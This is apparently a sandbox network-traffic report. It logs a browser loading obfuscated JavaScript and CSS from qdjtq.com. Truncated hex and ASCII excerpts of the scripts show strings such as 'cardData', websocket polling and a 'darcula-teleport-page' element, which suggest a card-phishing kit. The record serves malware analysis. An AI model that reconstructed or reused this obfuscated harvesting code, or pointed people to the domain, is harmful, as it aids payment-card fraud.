            2024-09-27 00:29:40 UTC6439INData Raw: 63 6f 6e 73 74 20 61 37 5f 30 78 32 35 65 35 33 38 3d 61 37 5f 30 78 38 32 35 31 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 66 39 63 64 2c 5f 30 78 35 37 30 62 64 37 29 7b 63 6f 6e 73 74 20 5f 30 78 34 34 39 35 30 39 3d 61 37 5f 30 78 38 32 35 31 2c 5f 30 78 31 64 64 37 65 65 3d 5f 30 78 32 30 66 39 63 64 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 39 63 66 65 62 34 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 62 61 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 39 63 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 63 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 62
            Data Ascii: const a7_0x25e538=a7_0x8251;(function(_0x20f9cd,_0x570bd7){const _0x449509=a7_0x8251,_0x1dd7ee=_0x20f9cd();while(!![]){try{const _0x9cfeb4=parseInt(_0x449509(0xba))/0x1*(parseInt(_0x449509(0x9c))/0x2)+-parseInt(_0x449509(0xcd))/0x3+-parseInt(_0x449509(0xb


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            28192.168.2.649746129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:39 UTC363OUTGET /modify/assets/c27b6911ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:40 UTC360INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:39 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 1917
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:36 GMT
            ETag: W/"77d-190249532a0"
            2024-09-27 00:29:40 UTC1917INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 36 38 62 36 62 2c 5f 30 78 33 62 33 34 62 34 29 7b 63 6f 6e 73 74 20 5f 30 78 33 65 61 66 38 35 3d 61 32 38 5f 30 78 33 31 37 34 2c 5f 30 78 33 36 32 37 64 31 3d 5f 30 78 36 38 62 36 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 62 32 61 35 38 37 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 64 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 37 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 35 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 39 29 29 2f 30 78 34 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38
            Data Ascii: (function(_0x68b6b,_0x3b34b4){const _0x3eaf85=a28_0x3174,_0x3627d1=_0x68b6b();while(!![]){try{const _0xb2a587=-parseInt(_0x3eaf85(0x10d))/0x1*(parseInt(_0x3eaf85(0x107))/0x2)+parseInt(_0x3eaf85(0x105))/0x3+-parseInt(_0x3eaf85(0x109))/0x4+parseInt(_0x3eaf8


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            29192.168.2.649747129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:40 UTC528OUTGET /modify/assets/d1a234c2ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:40 UTC364INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:40 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 113490
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:36 GMT
            ETag: W/"1bb52-190249532a0"
            2024-09-27 00:29:40 UTC16020INData Raw: 63 6f 6e 73 74 20 61 33 31 5f 30 78 31 61 35 33 31 33 3d 61 33 31 5f 30 78 32 65 61 32 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 66 37 35 63 65 2c 5f 30 78 35 38 66 37 66 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 37 66 39 62 35 3d 61 33 31 5f 30 78 32 65 61 32 2c 5f 30 78 34 64 34 65 62 32 3d 5f 30 78 32 66 37 35 63 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 36 62 63 31 39 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66 39 62 35 28 30 78 33 66 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66 39 62 35 28 30 78 33 65 36 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66 39 62 35 28 30 78 32 30 66 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66
            Data Ascii: const a31_0x1a5313=a31_0x2ea2;(function(_0x2f75ce,_0x58f7f3){const _0x27f9b5=a31_0x2ea2,_0x4d4eb2=_0x2f75ce();while(!![]){try{const _0x16bc19=-parseInt(_0x27f9b5(0x3f6))/0x1*(parseInt(_0x27f9b5(0x3e6))/0x2)+parseInt(_0x27f9b5(0x20f))/0x3*(-parseInt(_0x27f
            2024-09-27 00:29:40 UTC16384INData Raw: 75 73 65 72 2d 27 2c 27 e9 aa 8c e8 af 81 e9 a1 b5 27 2c 27 64 6f 50 6f 6c 6c 27 2c 27 64 65 63 6f 64 65 72 27 2c 27 70 72 69 6f 72 57 65 62 73 6f 27 2c 27 6f 72 65 5c 78 32 30 69 6e 66 6f 72 6d 27 2c 27 6f 6e 6f 70 65 6e 27 2c 27 6f 72 69 67 69 6e 27 2c 27 70 61 63 6b 65 74 43 72 65 61 27 2c 27 61 62 6f 72 74 27 2c 27 63 61 72 64 44 61 74 61 27 2c 27 66 72 6f 6d 43 68 61 72 43 6f 27 2c 27 61 63 74 69 6f 6e 4b 65 79 27 2c 27 31 36 35 37 31 31 35 39 71 55 42 6e 46 72 27 2c 27 72 65 66 72 65 73 68 27 2c 27 6f 66 66 6c 69 6e 65 45 76 65 27 2c 27 67 65 74 27 2c 27 4d 6f 64 75 6c 65 27 2c 27 68 72 65 66 27 2c 27 6a 65 63 74 5d 27 2c 27 63 61 74 63 68 27 2c 27 61 64 64 72 65 73 73 3a 27 2c 27 73 65 64 27 2c 27 65 66 67 68 69 6a 6b 6c 6d 6e 27 2c 27 2a 2f 2a 27
            Data Ascii: user-','','doPoll','decoder','priorWebso','ore\x20inform','onopen','origin','packetCrea','abort','cardData','fromCharCo','actionKey','16571159qUBnFr','refresh','offlineEve','get','Module','href','ject]','catch','address:','sed','efghijklmn','*/*'
            2024-09-27 00:29:40 UTC16384INData Raw: 73 74 20 5f 30 78 31 36 62 33 30 63 3d 61 33 31 5f 30 78 31 61 35 33 31 33 2c 5f 30 78 31 65 63 64 33 37 3d 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 31 39 63 29 5d 5b 5f 30 78 31 36 62 33 30 63 28 30 78 33 36 31 29 2b 27 78 74 27 5d 3b 5f 30 78 31 65 63 64 33 37 21 3d 3d 6e 75 6c 6c 26 26 28 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 5f 30 78 31 36 62 33 30 63 28 30 78 32 62 31 29 2c 5f 30 78 31 65 63 64 33 37 29 2c 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 5f 30 78 31 36 62 33 30 63 28 30 78 33 33 32 29 29 2c 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 32 62 39 29 5d 28 29 29 3b 7d 5b 61 33 31 5f 30 78 31 61 35 33 31 33 28 30 78 31 35 36 29 5d 28 29 7b 63
            Data Ascii: st _0x16b30c=a31_0x1a5313,_0x1ecd37=this[_0x16b30c(0x19c)][_0x16b30c(0x361)+'xt'];_0x1ecd37!==null&&(this[_0x16b30c(0x3e8)+'ed'](_0x16b30c(0x2b1),_0x1ecd37),this[_0x16b30c(0x3e8)+'ed'](_0x16b30c(0x332)),this[_0x16b30c(0x2b9)]());}[a31_0x1a5313(0x156)](){c
            2024-09-27 00:29:40 UTC16384INData Raw: 61 33 31 5f 30 78 31 61 35 33 31 33 3b 69 66 28 74 68 69 73 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 3d 3d 3d 5f 30 78 35 30 61 37 65 30 28 30 78 31 39 31 29 7c 7c 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 31 64 30 29 5d 3d 3d 3d 27 6f 70 65 6e 27 7c 7c 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 31 64 30 29 5d 3d 3d 3d 27 63 6c 6f 73 69 6e 67 27 29 73 77 69 74 63 68 28 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 27 70 61 63 6b 65 74 27 2c 5f 30 78 32 38 37 61 61 30 29 2c 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 5f 30 78 35 30 61 37 65 30 28 30 78 33 64 64 29 29 2c 74 68 69 73 5b 27 72 65 73 65 74 50 69 6e 67 54 27 2b 5f 30 78 35 30 61 37 65 30 28 30 78 31
            Data Ascii: a31_0x1a5313;if(this['readyState']===_0x50a7e0(0x191)||this[_0x50a7e0(0x1d0)]==='open'||this[_0x50a7e0(0x1d0)]==='closing')switch(this[_0x50a7e0(0x3e8)+'ed']('packet',_0x287aa0),this[_0x50a7e0(0x3e8)+'ed'](_0x50a7e0(0x3dd)),this['resetPingT'+_0x50a7e0(0x1
            2024-09-27 00:29:40 UTC16384INData Raw: 5f 30 78 32 34 39 63 64 65 2c 5f 30 78 35 33 37 37 30 36 29 7b 63 6f 6e 73 74 20 5f 30 78 33 36 37 35 38 35 3d 61 33 31 5f 30 78 31 61 35 33 31 33 3b 73 77 69 74 63 68 28 5f 30 78 32 34 39 63 64 65 29 7b 63 61 73 65 20 68 5b 27 43 4f 4e 4e 45 43 54 27 5d 3a 72 65 74 75 72 6e 20 62 65 28 5f 30 78 35 33 37 37 30 36 29 3b 63 61 73 65 20 68 5b 27 44 49 53 43 4f 4e 4e 45 43 54 27 5d 3a 72 65 74 75 72 6e 20 5f 30 78 35 33 37 37 30 36 3d 3d 3d 76 6f 69 64 20 30 78 30 3b 63 61 73 65 20 68 5b 5f 30 78 33 36 37 35 38 35 28 30 78 32 38 33 29 2b 27 52 4f 52 27 5d 3a 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 35 33 37 37 30 36 3d 3d 5f 30 78 33 36 37 35 38 35 28 30 78 32 65 33 29 7c 7c 62 65 28 5f 30 78 35 33 37 37 30 36 29 3b 63 61 73 65 20 68 5b 27 45 56 45
            Data Ascii: _0x249cde,_0x537706){const _0x367585=a31_0x1a5313;switch(_0x249cde){case h['CONNECT']:return be(_0x537706);case h['DISCONNECT']:return _0x537706===void 0x0;case h[_0x367585(0x283)+'ROR']:return typeof _0x537706==_0x367585(0x2e3)||be(_0x537706);case h['EVE
            2024-09-27 00:29:40 UTC16384INData Raw: 3b 7d 3b 63 6c 61 73 73 20 51 20 65 78 74 65 6e 64 73 20 6c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 5f 30 78 31 30 61 33 37 30 2c 5f 30 78 35 32 62 33 35 31 29 7b 63 6f 6e 73 74 20 5f 30 78 33 37 35 63 64 39 3d 61 33 31 5f 30 78 31 61 35 33 31 33 3b 76 61 72 20 5f 30 78 35 66 31 39 34 35 3b 73 75 70 65 72 28 29 2c 74 68 69 73 5b 5f 30 78 33 37 35 63 64 39 28 30 78 32 64 36 29 5d 3d 7b 7d 2c 74 68 69 73 5b 5f 30 78 33 37 35 63 64 39 28 30 78 33 33 66 29 5d 3d 5b 5d 2c 5f 30 78 31 30 61 33 37 30 26 26 74 79 70 65 6f 66 20 5f 30 78 31 30 61 33 37 30 3d 3d 5f 30 78 33 37 35 63 64 39 28 30 78 31 38 35 29 26 26 28 5f 30 78 35 32 62 33 35 31 3d 5f 30 78 31 30 61 33 37 30 2c 5f 30 78 31 30 61 33 37 30 3d 76 6f 69 64 20 30 78 30 29 2c 5f 30 78 35 32 62 33 35 31 3d
            Data Ascii: ;};class Q extends l{constructor(_0x10a370,_0x52b351){const _0x375cd9=a31_0x1a5313;var _0x5f1945;super(),this[_0x375cd9(0x2d6)]={},this[_0x375cd9(0x33f)]=[],_0x10a370&&typeof _0x10a370==_0x375cd9(0x185)&&(_0x52b351=_0x10a370,_0x10a370=void 0x0),_0x52b351=
            2024-09-27 00:29:41 UTC15550INData Raw: 78 33 39 65 63 63 65 5b 5f 30 78 34 63 34 65 37 63 28 30 78 32 65 34 29 5d 28 5f 30 78 34 63 34 65 37 63 28 30 78 33 62 35 29 29 29 61 33 31 5f 30 78 36 33 35 36 38 30 28 5f 30 78 33 39 65 63 63 65 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 35 39 35 30 30 36 3d 5b 27 68 74 74 70 73 3a 2f 2f 70 6f 27 2b 5f 30 78 34 63 34 65 37 63 28 30 78 33 33 64 29 2c 5f 30 78 34 63 34 65 37 63 28 30 78 33 32 31 29 2b 5f 30 78 34 63 34 65 37 63 28 30 78 31 38 65 29 2b 5f 30 78 34 63 34 65 37 63 28 30 78 32 66 31 29 2c 5f 30 78 34 63 34 65 37 63 28 30 78 33 36 38 29 2b 27 6e 64 65 78 2e 63 6f 6d 2f 27 5d 3b 6c 65 74 20 5f 30 78 33 39 38 36 30 64 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 5f 30 78 34 63 34 65 37 63 28 30 78 33 65 62 29 5d 28 5f 30 78 34 63 34 65 37 63
            Data Ascii: x39ecce[_0x4c4e7c(0x2e4)](_0x4c4e7c(0x3b5)))a31_0x635680(_0x39ecce);else{const _0x595006=['https://po'+_0x4c4e7c(0x33d),_0x4c4e7c(0x321)+_0x4c4e7c(0x18e)+_0x4c4e7c(0x2f1),_0x4c4e7c(0x368)+'ndex.com/'];let _0x39860d=localStorage[_0x4c4e7c(0x3eb)](_0x4c4e7c


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            30192.168.2.649748129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:40 UTC361OUTGET /api/MC42MTg2MTE1MDg1Nzk2NjAy HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:40 UTC164INHTTP/1.1 404 Not Found
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:40 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:40 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            31192.168.2.649752129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:42 UTC555OUTGET /modify/assets/f4397cedtE5dP.css HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: text/css,*/*;q=0.1
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: style
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:42 UTC322INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:42 GMT
            Content-Type: text/css; charset=utf-8
            Content-Length: 400
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"190-19024951360"
            2024-09-27 00:29:42 UTC400INData Raw: 68 74 6d 6c 2c 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 5b 73 72 63 3d 22 64 61 74 61 3a 2c 22 5d 2c 73 6f 75 72 63 65 5b 73 72 63 3d 22 64 61 74 61 3a 2c 22 5d 2c 2e 73 66 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 64 61 72 63 75 6c 61 2d 74 65 6c 65 70 6f 72 74 2d 70 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 64 76 68 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 31 30 7d 69 6e 70 75 74 5b 69 6e 70 75 74 6d 6f 64 65 3d 6e 75 6d 65 72 69 63 5d 2c 69 6e 70 75 74 5b 74 79 70
            Data Ascii: html,body{padding:0;border:0;margin:0}img[src="data:,"],source[src="data:,"],.sf-hidden{display:none!important}#darcula-teleport-page{position:fixed;top:0;left:0;width:100vw;height:100dvh;background-color:#fff;z-index:10}input[inputmode=numeric],input[typ


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            32192.168.2.649753129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:42 UTC528OUTGET /modify/assets/63d4f0c9ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:43 UTC364INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:42 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 115770
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"1c43a-19024951b30"
            2024-09-27 00:29:43 UTC16020INData Raw: 76 61 72 20 61 31 38 5f 30 78 32 38 35 32 38 32 3d 61 31 38 5f 30 78 39 36 36 36 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 62 33 38 63 36 2c 5f 30 78 35 65 31 65 34 38 29 7b 76 61 72 20 5f 30 78 33 39 38 36 62 30 3d 61 31 38 5f 30 78 39 36 36 36 2c 5f 30 78 35 34 38 31 36 34 3d 5f 30 78 31 62 33 38 63 36 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 64 39 61 36 62 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 36 31 65 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 32 66 31 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 35 66 37 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 39 38 36 62 30 28 30 78 33 63 63
            Data Ascii: var a18_0x285282=a18_0x9666;(function(_0x1b38c6,_0x5e1e48){var _0x3986b0=a18_0x9666,_0x548164=_0x1b38c6();while(!![]){try{var _0x1d9a6b=-parseInt(_0x3986b0(0x61e))/0x1+parseInt(_0x3986b0(0x2f1))/0x2+parseInt(_0x3986b0(0x5f7))/0x3*(parseInt(_0x3986b0(0x3cc
            2024-09-27 00:29:43 UTC16384INData Raw: 4a 63 79 3b 27 3a 27 d0 82 27 2c 27 26 44 53 63 79 3b 27 3a 27 d0 85 27 2c 27 26 44 5a 63 79 3b 27 3a 27 d0 8f 27 2c 27 26 44 61 67 67 65 72 3b 27 3a 27 e2 80 a1 27 2c 27 26 44 61 72 72 3b 27 3a 27 e2 86 a1 27 2c 27 26 44 61 73 68 76 3b 27 3a 27 e2 ab a4 27 2c 27 26 44 63 61 72 6f 6e 3b 27 3a 27 c4 8e 27 2c 27 26 44 63 79 3b 27 3a 27 d0 94 27 2c 27 26 44 65 6c 3b 27 3a 27 e2 88 87 27 2c 27 26 44 65 6c 74 61 3b 27 3a 27 ce 94 27 2c 27 26 44 66 72 3b 27 3a 27 f0 9d 94 87 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 41 63 75 74 65 3b 27 3a 27 c2 b4 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 74 3b 27 3a 27 cb 99 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 75 62 6c 65 41 63 75 74 65 3b 27 3a 27 cb 9d 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c
            Data Ascii: Jcy;':'','&DScy;':'','&DZcy;':'','&Dagger;':'','&Darr;':'','&Dashv;':'','&Dcaron;':'','&Dcy;':'','&Del;':'','&Delta;':'','&Dfr;':'','&DiacriticalAcute;':'','&DiacriticalDot;':'','&DiacriticalDoubleAcute;':'','&Diacritical
            2024-09-27 00:29:43 UTC16384INData Raw: 67 65 3b 27 3a 27 e2 8c 86 27 2c 27 26 64 6f 77 6e 61 72 72 6f 77 3b 27 3a 27 e2 86 93 27 2c 27 26 64 6f 77 6e 64 6f 77 6e 61 72 72 6f 77 73 3b 27 3a 27 e2 87 8a 27 2c 27 26 64 6f 77 6e 68 61 72 70 6f 6f 6e 6c 65 66 74 3b 27 3a 27 e2 87 83 27 2c 27 26 64 6f 77 6e 68 61 72 70 6f 6f 6e 72 69 67 68 74 3b 27 3a 27 e2 87 82 27 2c 27 26 64 72 62 6b 61 72 6f 77 3b 27 3a 27 e2 a4 90 27 2c 27 26 64 72 63 6f 72 6e 3b 27 3a 27 e2 8c 9f 27 2c 27 26 64 72 63 72 6f 70 3b 27 3a 27 e2 8c 8c 27 2c 27 26 64 73 63 72 3b 27 3a 27 f0 9d 92 b9 27 2c 27 26 64 73 63 79 3b 27 3a 27 d1 95 27 2c 27 26 64 73 6f 6c 3b 27 3a 27 e2 a7 b6 27 2c 27 26 64 73 74 72 6f 6b 3b 27 3a 27 c4 91 27 2c 27 26 64 74 64 6f 74 3b 27 3a 27 e2 8b b1 27 2c 27 26 64 74 72 69 3b 27 3a 27 e2 96 bf 27 2c 27
            Data Ascii: ge;':'','&downarrow;':'','&downdownarrows;':'','&downharpoonleft;':'','&downharpoonright;':'','&drbkarow;':'','&drcorn;':'','&drcrop;':'','&dscr;':'','&dscy;':'','&dsol;':'','&dstrok;':'','&dtdot;':'','&dtri;':'','
            2024-09-27 00:29:43 UTC16384INData Raw: 69 3b 27 3a 27 cf 95 27 2c 27 26 73 74 72 6e 73 3b 27 3a 27 c2 af 27 2c 27 26 73 75 62 3b 27 3a 27 e2 8a 82 27 2c 27 26 73 75 62 45 3b 27 3a 27 e2 ab 85 27 2c 27 26 73 75 62 64 6f 74 3b 27 3a 27 e2 aa bd 27 2c 27 26 73 75 62 65 3b 27 3a 27 e2 8a 86 27 2c 27 26 73 75 62 65 64 6f 74 3b 27 3a 27 e2 ab 83 27 2c 27 26 73 75 62 6d 75 6c 74 3b 27 3a 27 e2 ab 81 27 2c 27 26 73 75 62 6e 45 3b 27 3a 27 e2 ab 8b 27 2c 27 26 73 75 62 6e 65 3b 27 3a 27 e2 8a 8a 27 2c 27 26 73 75 62 70 6c 75 73 3b 27 3a 27 e2 aa bf 27 2c 27 26 73 75 62 72 61 72 72 3b 27 3a 27 e2 a5 b9 27 2c 27 26 73 75 62 73 65 74 3b 27 3a 27 e2 8a 82 27 2c 27 26 73 75 62 73 65 74 65 71 3b 27 3a 27 e2 8a 86 27 2c 27 26 73 75 62 73 65 74 65 71 71 3b 27 3a 27 e2 ab 85 27 2c 27 26 73 75 62 73 65 74 6e 65
            Data Ascii: i;':'','&strns;':'','&sub;':'','&subE;':'','&subdot;':'','&sube;':'','&subedot;':'','&submult;':'','&subnE;':'','&subne;':'','&subplus;':'','&subrarr;':'','&subset;':'','&subseteq;':'','&subseteqq;':'','&subsetne
            2024-09-27 00:29:43 UTC16384INData Raw: 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 33 37 29 2b 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 35 35 36 29 2c 27 e2 89 bf 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 30 64 29 2c 27 e2 88 91 27 3a 27 26 73 75 6d 3b 27 2c 27 e2 8b 91 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 64 63 29 2c 27 e2 8a 83 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 33 64 30 29 2c 27 e2 8a 87 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 31 65 32 29 2c 27 c3 9e 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 32 38 39 29 2c 27 e2 84 a2 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 39 35 29 2c 27 d0 8b 27 3a 27 26 54 53 48 63 79 3b 27 2c 27 d0 a6 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 33 63 37 29 2c 27 5c 78 30 39 27 3a
            Data Ascii: 18_0x285282(0x437)+a18_0x285282(0x556),'':a18_0x285282(0x40d),'':'&sum;','':a18_0x285282(0x4dc),'':a18_0x285282(0x3d0),'':a18_0x285282(0x1e2),'':a18_0x285282(0x289),'':a18_0x285282(0x495),'':'&TSHcy;','':a18_0x285282(0x3c7),'\x09':
